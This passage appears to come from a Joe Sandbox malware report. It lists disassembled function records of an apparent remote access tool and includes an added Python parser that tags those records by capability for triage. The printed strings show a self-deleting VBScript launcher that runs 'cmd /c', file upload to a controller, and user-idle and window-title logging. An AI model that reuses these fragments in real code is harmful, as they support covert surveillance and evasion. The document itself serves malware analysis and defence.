                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                • String ID: Close
                                                                                                                                                • API String ID: 1657328048-3535843008
                                                                                                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$Info
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                                                                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                                                                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                • API String ID: 3086580692-2582957567
                                                                                                                                                • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                                                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                                                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                • API String ID: 3795512280-1152054767
                                                                                                                                                • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                                                                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                                                                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                                                                                APIs
                                                                                                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                • API String ID: 994465650-3229884001
                                                                                                                                                • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                                                                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                                                                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                                                                                APIs
                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                • _free.LIBCMT ref: 0045137F
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 004513A1
                                                                                                                                                • _free.LIBCMT ref: 004513B6
                                                                                                                                                • _free.LIBCMT ref: 004513C1
                                                                                                                                                • _free.LIBCMT ref: 004513E3
                                                                                                                                                • _free.LIBCMT ref: 004513F6
                                                                                                                                                • _free.LIBCMT ref: 00451404
                                                                                                                                                • _free.LIBCMT ref: 0045140F
                                                                                                                                                • _free.LIBCMT ref: 00451447
                                                                                                                                                • _free.LIBCMT ref: 0045144E
                                                                                                                                                • _free.LIBCMT ref: 0045146B
                                                                                                                                                • _free.LIBCMT ref: 00451483
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
  • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-3159800282
• Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
• Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
• Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
• Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
APIs
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
• Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
• Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
• Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
APIs
  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
• GetLastError.KERNEL32 ref: 00455D6F
• __dosmaperr.LIBCMT ref: 00455D76
• GetFileType.KERNEL32(00000000), ref: 00455D82
• GetLastError.KERNEL32 ref: 00455D8C
• __dosmaperr.LIBCMT ref: 00455D95
• CloseHandle.KERNEL32(00000000), ref: 00455DB5
• CloseHandle.KERNEL32(?), ref: 00455EFF
• GetLastError.KERNEL32 ref: 00455F31
• __dosmaperr.LIBCMT ref: 00455F38
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
• Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
• Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
• Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
• __alloca_probe_16.LIBCMT ref: 0044AD5B
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
• __alloca_probe_16.LIBCMT ref: 0044AE40
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
• __freea.LIBCMT ref: 0044AEB0
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
• __freea.LIBCMT ref: 0044AEB9
• __freea.LIBCMT ref: 0044AEDE
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID: PkGNG$tC
• API String ID: 3864826663-4196309852
• Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
• Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
• Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
• Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: \&G$\&G$`&G
• API String ID: 269201875-253610517
• Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
• Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
• Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
• Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
• Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
• Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
• Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
• Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
APIs
• __Init_thread_footer.LIBCMT ref: 0040AD73
• Sleep.KERNEL32(000001F4), ref: 0040AD7E
• GetForegroundWindow.USER32 ref: 0040AD84
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
• Sleep.KERNEL32(000003E8), ref: 0040AE8F
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
• Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
• Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
• Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
• Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
• Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
• Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
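Three of the records above are worth more than a glance during triage: the self-deleting VBScript launcher (ShellExecuteW plus the Wscript.ScriptFullName fragments), the idle-time tracker (GetForegroundWindow, GetWindowTextW and Sleep beside the "User has been idle for ... minutes" fragments) and the environment-path expander (GetLongPathNameW beside AppData, ProgramData, Temp, \SysWOW64 and the other folder names). Reading these by eye does not scale across a listing of this length, so the parser below, an added example written for this page and not Joe Sandbox, Remcos or report code, turns the records into structured data and tags each function by its API and string mix. The record grammar is inferred from the listing itself; the capability rules are this example's own heuristics (an assumption, not a Joe Sandbox signature), and SAMPLE_LISTING is an abridged copy of those three records.

```python
"""Parse Joe Sandbox IDA-plugin function records (the 'APIs' / 'String ID' / 'Opcode ID'
blocks in this listing) and tag each function with the capability its API and string mix implies.

Added example for this page, not Joe Sandbox, Remcos or report code. The record grammar is
inferred from the listing; CAPABILITY_RULES are this example's own heuristics (an assumption);
SAMPLE_LISTING is an abridged copy of three records from the page (values unchanged).
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API reference line; optional "Part of subcall function X:" prefix and argument list.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$"
)
# Any other "• Key: value" line (API ID, String ID, Opcode ID, fuzzy hashes, ...).
KEY_LINE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")


@dataclass
class ApiCall:
    func: str
    dll: str
    args: tuple
    ref: str
    subcall: Optional[str]  # callee address when the call sits inside a subcall


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_records(text: str) -> list:
    """Split the listing into records; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:  # tried first: an API line also contains ':' and would match KEY_LINE
            sub, func, dll, args, ref = m.groups()
            cur.apis.append(ApiCall(func, dll, tuple(args.split(",")) if args else (), ref, sub))
            continue
        m = KEY_LINE.match(line)
        if not m:
            continue  # bare section labels: APIs, Strings, Similarity, ...
        key, value = m.group(1).strip(), m.group(2)
        if key == "String ID":
            # Joe Sandbox joins the strings with '$'; a string containing a literal '$' is split too.
            cur.strings = [s for s in value.split("$") if s]
        else:
            cur.fields[key] = value.strip()
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.fields:  # truncated last record: keep it rather than drop it silently
        records.append(cur)
    return records


# Heuristics (assumption): every API in the set must be referenced (subcalls included) and
# every needle must occur in at least one of the function's strings.
CAPABILITY_RULES = [
    ("vbs_self_delete", {"ShellExecuteW", "ExitProcess"}, ["DeleteFile(Wscript.ScriptFullName)", ".vbs"]),
    ("idle_time_logging", {"GetForegroundWindow", "GetWindowTextW", "Sleep"}, ["idle for"]),
    ("env_path_expansion", {"GetLongPathNameW"}, ["AppData", "Temp", "SysWOW64"]),
    ("registry_read", {"RegOpenKeyExA", "RegQueryValueExA"}, []),
    ("process_termination", {"TerminateProcess"}, []),
]


def tag_capabilities(rec: FunctionRecord) -> list:
    names = {c.func for c in rec.apis}
    return [name for name, apis, needles in CAPABILITY_RULES
            if apis <= names and all(any(n in s for s in rec.strings) for n in needles)]


def triage(text: str) -> dict:
    """Map the first 12 hex digits of each Opcode ID to its capability tags."""
    return {r.fields.get("Opcode ID", "?")[:12]: tag_capabilities(r) for r in parse_records(text)}


SAMPLE_LISTING = r'''
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
Strings
• String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
• Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
APIs
• Sleep.KERNEL32(000001F4), ref: 0040AD7E
• GetForegroundWindow.USER32 ref: 0040AD84
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
• String ID: [${ User has been idle for $ minutes }$]
• Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
• Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
• Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
'''

if __name__ == "__main__":
    for opcode, tags in triage(SAMPLE_LISTING).items():
        print(opcode, tags)
```

Subcall APIs are folded into the caller on purpose: the registry read and TerminateProcess in the first record live in helpers, but they are what the launcher does, so a rule that ignored them would miss the behaviour. The '$' separator is a Joe Sandbox display convention, and a genuine '$' inside a string (a PowerShell variable, for example) is split the same way, so needles should be substrings that survive that split, as they are here.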
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
• GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
• __dosmaperr.LIBCMT ref: 0043A926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
• GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
• __dosmaperr.LIBCMT ref: 0043A963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
• __dosmaperr.LIBCMT ref: 0043A9B7
• _free.LIBCMT ref: 0043A9C3
• _free.LIBCMT ref: 0043A9CA
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
• Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
• Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
• Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
